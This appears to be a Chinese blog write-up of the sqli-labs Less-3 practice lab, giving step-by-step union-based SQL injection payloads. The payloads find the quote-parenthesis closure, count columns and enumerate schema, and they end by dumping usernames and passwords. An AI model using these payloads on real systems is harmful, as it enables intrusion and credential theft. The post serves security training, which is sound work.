SQL注入实例(sqli-labs/less-3)

0、初始页面

1、确定闭合字符

确定为字符型注入

复制代码
?id=1 and 1=1 
?id=1 and 1=2

确定闭合字符为 ')

复制代码
?id=1'
?id=1')

2、确定表的列数

确定查询表的列数为3

复制代码
?id=1') order by 3 --+

3、确定回显位置

确定回显位置为第二列和第三列

复制代码
?id=-1') union select 1,2,3 --+

4、爆库名

当前所在数据库为security

复制代码
?id=-1') union select 1,user(),database() --+

5、爆表名

查看users表

复制代码
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema = 'security' --+

6、爆列名

复制代码
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users' --+

7、显示最终结果

复制代码
?id=-1%27) union select 1,2,group_concat(username,0x3a,password) from security.users --+
相关推荐
GIS之路2 小时前
GeoTools 基础概念解析
数据库·设计模式·oracle
NetX行者5 小时前
.NET 9 GUID v7 vs v4:时间有序性如何颠覆数据库索引性能
数据库·mysql·abp vnext
sunon_5 小时前
实现druid数据源密码加密
数据库
sevevty-seven6 小时前
Redis中的红锁
数据库·redis·php
GoodStudyAndDayDayUp9 小时前
dbever 导出数据库表的建表语句和数据插入语句
数据库
没有口袋啦9 小时前
《Reids》配置文件
数据库·redis
诺亚凹凸曼9 小时前
浅谈mysql的undolog
数据库·mysql
m0_694845579 小时前
云服务器如何管理数据库(MySQL/MongoDB)?
服务器·数据库·mysql
devops_sre10 小时前
mongodb原理及其实现
数据库·mongodb
wackpa10 小时前
说下对mysql MVCC的理解
数据库·mysql